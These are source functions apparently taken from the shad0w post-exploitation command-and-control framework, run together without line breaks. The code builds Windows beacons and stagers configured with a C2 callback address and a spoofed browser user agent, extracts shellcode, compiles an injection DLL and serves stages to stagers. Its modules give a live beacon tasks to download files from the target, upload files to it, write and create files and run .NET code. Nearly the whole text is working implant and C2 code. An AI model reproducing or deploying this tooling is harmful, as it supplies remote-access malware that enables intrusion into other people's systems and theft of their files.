def generate_beacon_code(shad0w, beacon): buildtools.clone_source_files(rootdir='injectable') settings_template = """#define _C2_CALLBACK_ADDRESS L"%s" #define _C2_CALLBACK_PORT %s #define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36" #define _CALLBACK_JITTER %s000 #define IMPERSONATE_SESSION "%s" """ % (shad0w.endpoint, shad0w.addr[1], 1, None) buildtools.update_settings_file(None, custom_template=settings_template) if beacon is None: os = shad0w.beacons[shad0w.current_beacon]["os"] arch = shad0w.beacons[shad0w.current_beacon]["arch"] secure = shad0w.beacons[shad0w.current_beacon]["secure"] else: arch, arch, secure, _ = buildtools.get_payload_variables(beacon) buildtools.make_in_clone(arch=arch, platform=os, secure=secure, static=True) return buildtools.extract_shellcode()
def build(self): # copy source files into build directory buildtools.clone_source_files() # change the settings file based on the args we been given buildtools.update_settings_file(self) # now we need to run 'make' inside the cloned dir buildtools.make_in_clone() # now get the beacon in the correct format if self.format == "raw": # extract the shellcode from the new beacon rcode = buildtools.extract_shellcode() # write the shellcode buildtools.write_and_bridge(self.outfile, rcode) if self.format == "exe": # get the bytes of the exe with open("/root/shad0w/beacon/beacon.exe", 'rb') as file: rcode = file.read() # then give them the exe and bridge it buildtools.write_and_bridge(self.outfile, rcode)
def build(self): # get the variables for the make self.arch, self.platform, self.secure, self.static = buildtools.get_payload_variables( self.payload) # copy the correct source files into build directory if self.static is not None: # then we are building a static beacon buildtools.clone_source_files(asm=True) if self.static is None: # then we are building a stager buildtools.clone_source_files(asm=True, rootdir="stager") # change the settings file based on the args we been given buildtools.update_settings_file(self) # now we need to run 'make' inside the cloned dir buildtools.make_in_clone(arch=self.arch, platform=self.platform, secure=self.secure, static=self.static, debug=self.debugv) length = payload_format.create(self) if length != False: print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
def main(shad0w, args): # check we actually have a beacon if shad0w.current_beacon is None: shad0w.debug.error("ERROR: No active beacon") return # clone all the source files buildtools.clone_source_files( rootdir="/root/shad0w/modules/windows/dotnet/", builddir="/root/shad0w/modules/windows/dotnet/build") # compile the module buildtools.make_in_clone( builddir="/root/shad0w/modules/windows/dotnet/build", modlocation="/root/shad0w/modules/windows/dotnet/module.exe", arch="x64") # get the shellcode from the module rcode = buildtools.extract_shellcode( beacon_file="/root/shad0w/modules/windows/dotnet/module.exe", want_base64=True) # set a task for the current beacon to do shad0w.beacons[shad0w.current_beacon]["callback"] = dotnet_callback shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
def main(shad0w, args): # save the raw args raw_args = args # check we actually have a beacon if shad0w.current_beacon is None: shad0w.debug.error("ERROR: No active beacon") return # usage examples usage_examples = """ Example: write -f "C:\\Users\\thejoker\\writetome.txt" -d "i am going to be written" """ parse = argparse.ArgumentParser(prog='write', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=usage_examples) # keep it behaving nice parse.exit = exit parse.error = error # setup the args parse.add_argument("-f", "--file", required=True, help="Name of the file you want to write to") parse.add_argument("-d", "--data", nargs="*", required=True, help="Data you want to write to the file") # make sure we dont die from weird args try: args = parse.parse_args(args[1:]) except: pass if not (args.file and args.data): if ERROR: print(error_list) parse.print_help() return # clone all the source files buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/write/", builddir="/root/shad0w/modules/windows/write/build") # set the correct settings filename = ''.join(args.file).replace('"', '').replace('\\', '\\\\') data = ' '.join(args.data).replace('"', '').replace('\\', '\\\\') template = "LPCSTR szFileName = \"%s\";\nLPCSTR* wData = \"%s\";" % (filename, data) buildtools.update_settings_file(None, custom_template=template, custom_path="/root/shad0w/modules/windows/write/build/settings.h") # compile the module buildtools.make_in_clone(builddir="/root/shad0w/modules/windows/write/build", modlocation="/root/shad0w/modules/windows/write/module.exe") # get the shellcode from the module rcode = buildtools.extract_shellcode(beacon_file="/root/shad0w/modules/windows/write/module.exe", want_base64=True) # set a task for the current beacon to do shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
async def compile_and_store_static(shad0w): # compile a static secure beacon and store it in memory shad0w.payloads["x64_secure_static"] = {} arch = "x64" platform = "windows" secure = "secure" static = "static" # basically just make a random string dir_name = generate_beacon_id() lib_dir_name = "/tmp/" + dir_name + "/lib/" build_dir_name = "/tmp/" + dir_name + "/build/" Path(lib_dir_name).mkdir(parents=True, exist_ok=True) Path(build_dir_name).mkdir(parents=True, exist_ok=True) mod_name = f"{build_dir_name}../beacon.exe" os.system(f"cp -r /root/shad0w/beacon/lib/* {lib_dir_name}") # clone the source files into the temp dir buildtools.clone_source_files(rootdir="injectable", builddir=build_dir_name) # set the settings settings_template = """#define _C2_CALLBACK_ADDRESS L"%s" #define _C2_CALLBACK_PORT %s #define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36" #define _CALLBACK_JITTER %s000 #define IMPERSONATE_SESSION \"%s\"""" % (shad0w.endpoint, shad0w.addr[1], 1, None) # write the new settings buildtools.update_settings_file(None, custom_template=settings_template, custom_path=build_dir_name + "/settings.h") # do the compile buildtools.make_in_clone(arch=arch, platform=platform, secure=secure, static=static, builddir=build_dir_name, modlocation=mod_name) # read the exe into memory with open(mod_name, "rb") as file: shad0w.payloads["x64_secure_static"]["exe"] = file.read() # read the shellcode into memory shad0w.payloads["x64_secure_static"]["bin"] = buildtools.extract_shellcode( beacon_file=mod_name) # say we finished compiling an quit shad0w.compile_finished = True return
def stage_beacon(self, request): # this will be hit when a stager is requesting a beacon. We will need to parse # the request for the beacon and generate the correct one, once this is done we # will to to send it back to the stager. # a stager should request a beacon via a post request if request.method == "POST": # get the payload from the request payload = request.form['payload'] # get the variables for the make arch, platform, secure, static = buildtools.get_payload_variables( payload, warn=False) # copy the correct source files into build directory if static is not None: # then we are building a static beacon buildtools.clone_source_files(asm=True) if static is None: # the we are building a stager buildtools.clone_source_files(asm=True, rootdir="stager") # change the settings file based on the args we been given # these settings should be given by the stager in its request settings_template = """#define _C2_CALLBACK_ADDRESS L"%s" #define _C2_CALLBACK_PORT %s #define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36" #define _CALLBACK_JITTER %s000 """ % (self.shad0w.endpoint, self.shad0w.addr[1], 1) buildtools.update_settings_file(None, custom_template=settings_template) # now we need to run 'make' inside the cloned dir self.shad0w.debug.spinner(f"Preparing stage...") buildtools.make_in_clone(arch=arch, platform=platform, secure=secure, static=static) self.shad0w.debug.stop_spinner = True # get the shellcode from the payload rcode = buildtools.extract_shellcode(want_base64=True) # give the shellcode to the stager self.shad0w.debug.log( f"Sending stage {self.shad0w.endpoint} --> {request.remote_addr} ({len(rcode)} bytes)", log=True) return rcode else: self.shad0w.debug.log("invaild http method for stager") return self.builder.build(blank=True)
def generate_beacon_dll(shad0w, rcode): # write header file write_header(rcode, "/root/shad0w/modules/windows/shinject/beacon.h") # build the dll buildtools.clone_source_files(rootdir="/root/shad0w/modules/windows/shinject/", basedir="/root/shad0w/modules/windows/shinject/") made = buildtools.make_in_clone(modlocation="/root/shad0w/modules/windows/shinject/module.dll", builddir=os.getcwd(), make_target="x64") # check that the dll has built if made is not True: shad0w.debug.error("Error building migrate dll.") return # return the base64 dll data return get_dll_data("/root/shad0w/modules/windows/shinject/module.dll")
def main(shad0w, args): global FILE_TO_DOWLOAD # check we actually have a beacon if shad0w.current_beacon is None: shad0w.debug.error("ERROR: No active beacon") return # usage examples usage_examples = """ Examples: download C:\\Users\\thejoker\\Desktop\\evil_plans.txt """ # init the parser parse = argparse.ArgumentParser( prog='download', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=usage_examples) # keep it behaving nice parse.exit = exit parse.error = error # setup the args parse.add_argument("file", nargs='*', help="File you want to download") # make sure we dont die from weird args try: args = parse.parse_args(args[1:]) except: pass # we need a file to read so if we dont then fail if len(args.file) == 0: print(error_list) parse.print_help() return # save the current dir shad0w_cwd = os.getcwd() # change to the dir of the folder mapped to the users current dir os.chdir("/root/shad0w/.bridge") # make this variable global so the call back can access it FILE_TO_DOWLOAD = args.file # change back to our dir os.chdir(shad0w_cwd) # clean up the file name read_file = ' '.join(args.file).replace('\\', "\\\\").replace('"', '') # clone all the source files buildtools.clone_source_files( rootdir="/root/shad0w/modules/windows/download/", builddir="/root/shad0w/modules/windows/download/build") # set the correct settings template = """#define _C2_CALLBACK_ADDRESS L"%s" #define _C2_CALLBACK_PORT %s #define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36" #define _C2CALLBACK_URI L"/tasks" #define _POST_HEADER L"Content-Type: application/x-www-form-urlencoded\\r\\n" #define _HEADER_LEN -1 #define SESSION_ID "%s" #define DO_CALLBACK 0x4000 #define FILENAME "%s" """ % (shad0w.endpoint, shad0w.addr[1], shad0w.current_beacon, read_file) buildtools.update_settings_file( None, custom_template=template, custom_path="/root/shad0w/modules/windows/download/build/settings.h") # compile the module buildtools.make_in_clone( builddir="/root/shad0w/modules/windows/download/build", modlocation="/root/shad0w/modules/windows/download/module.exe", arch="x64") # get the shellcode from the module rcode = buildtools.extract_shellcode( beacon_file="/root/shad0w/modules/windows/download/module.exe", want_base64=True) # set a task for the current beacon to do shad0w.beacons[shad0w.current_beacon]["callback"] = download_callback shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
def main(shad0w, args): global FILE_TO_UPLOAD, FILE_DATA # used to determine if we are writing to a path or not abs_path = "TRUE" # save the raw args raw_args = args # check we actually have a beacon if shad0w.current_beacon is None: shad0w.debug.error("ERROR: No active beacon") return # usage examples usage_examples = """ Examples: upload -f fake_secret_plans.txt -d C:\\Users\\thejoker\\Desktop\\batmans_secret_plans.txt """ # init the parser parse = argparse.ArgumentParser( prog='upload', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=usage_examples) # keep it behaving nice parse.exit = exit parse.error = error # setup the args parse.add_argument("-f", "--file", required=True, help="Name of the file you want to upload") parse.add_argument( "-d", "--destination", nargs="*", help="Destination where the uploaded file should be stored") # make sure we dont die from weird args try: args = parse.parse_args(args[1:]) except: pass # we need a file to read so if we dont then fail if len(args.file) == 0: print(error_list) parse.print_help() return # make the destination file name if args.destination == None: args.destination = os.path.basename(args.file) abs_path = "FALSE" # save the current dir shad0w_cwd = os.getcwd() # change to the dir of the folder mapped to the users current dir os.chdir("/root/shad0w/.bridge") # read the data from the file try: with open(args.file, 'rb') as file: FILE_DATA = file.read() except: shad0w.debug.error(f"File {args.file} does not exist") # make this variable global so the call back can access it FILE_TO_UPLOAD = args.file # change back to our dir os.chdir(shad0w_cwd) # clone all the source files buildtools.clone_source_files( rootdir="/root/shad0w/modules/windows/upload/", builddir="/root/shad0w/modules/windows/upload/build") # set the correct settings template = """#define _C2_CALLBACK_ADDRESS L"%s" #define _C2_CALLBACK_PORT %s #define _CALLBACK_USER_AGENT L"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36" #define _C2CALLBACK_URI L"/tasks" #define _POST_HEADER L"Content-Type: application/x-www-form-urlencoded\\r\\n" #define _HEADER_LEN -1 #define SESSION_ID "%s" #define DO_CALLBACK 0x4000 #define FILENAME "%s" #define ABS_PATH %s""" % (shad0w.endpoint, shad0w.addr[1], shad0w.current_beacon, ''.join( args.destination), abs_path) buildtools.update_settings_file( None, custom_template=template, custom_path="/root/shad0w/modules/windows/upload/build/settings.h") # compile the module buildtools.make_in_clone( builddir="/root/shad0w/modules/windows/upload/build", modlocation="/root/shad0w/modules/windows/upload/module.exe", arch="x64") # get the shellcode from the module rcode = buildtools.extract_shellcode( beacon_file="/root/shad0w/modules/windows/upload/module.exe", want_base64=True) # set a task for the current beacon to do shad0w.beacons[shad0w.current_beacon]["callback"] = upload_callback shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)
def main(shad0w, args): # save the raw args raw_args = args # check we actually have a beacon if shad0w.current_beacon is None: shad0w.debug.error("ERROR: No active beacon") return # usage examples usage_examples = """ Example: touch "C:\\Users\\thejoker\\hello.txt" """ parse = argparse.ArgumentParser( prog='touch', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=usage_examples) # keep it behaving nice parse.exit = exit parse.error = error # setup the args parse.add_argument("name", nargs='*', help="Name of the file you want to create") # make sure we dont die from weird args try: args = parse.parse_args(args[1:]) except: pass if not args.name: parse.print_help() return # clone all the source files buildtools.clone_source_files( rootdir="/root/shad0w/modules/windows/touch/", builddir="/root/shad0w/modules/windows/touch/build") # set the correct settings template = "LPCSTR szFileName = \"%s\";" % (' '.join(args.name).replace( '"', '').replace('\\', '\\\\')) buildtools.update_settings_file( None, custom_template=template, custom_path="/root/shad0w/modules/windows/touch/build/settings.h") # compile the module buildtools.make_in_clone( builddir="/root/shad0w/modules/windows/touch/build", modlocation="/root/shad0w/modules/windows/touch/module.exe") # get the shellcode from the module rcode = buildtools.extract_shellcode( beacon_file="/root/shad0w/modules/windows/touch/module.exe", want_base64=True) # set a task for the current beacon to do shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, rcode)